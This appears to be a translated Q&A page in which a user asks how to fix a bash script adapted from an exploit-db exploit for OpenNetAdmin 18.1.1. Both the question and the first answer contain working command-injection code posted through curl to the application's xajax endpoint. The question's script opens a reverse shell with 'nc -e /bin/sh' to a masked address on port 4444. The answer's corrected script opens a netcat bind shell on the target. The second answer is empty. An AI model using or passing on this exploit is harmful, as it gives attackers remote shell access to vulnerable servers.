Bash的语法漏洞

问题描述 投票:-1回答:2

[我在OpenNetAdmin 18.1.1的exploit-db中找到了exploit

我必须调整此脚本,以便它对我有用,但我没有完成。这是我到目前为止的内容:

URL="xxx.xxx.xxx.xxx/ona"
while true;do
 echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

输出为:

{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }

我在语法上有点挣扎。

我做错了什么?

linux bash syntax exploit shellcode
2个回答
0
投票

这就是您想要的,如果您只需要启动nc程序。该脚本假定远程计算机是Linux计算机,/ bin / bash和nc(netcat)使用-e support编译]

#!/bin/bash
URL="http://.../ona" 
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

-1
投票

我找到了适合的解决方案:

© www.soinside.com 2019 - 2024. All rights reserved.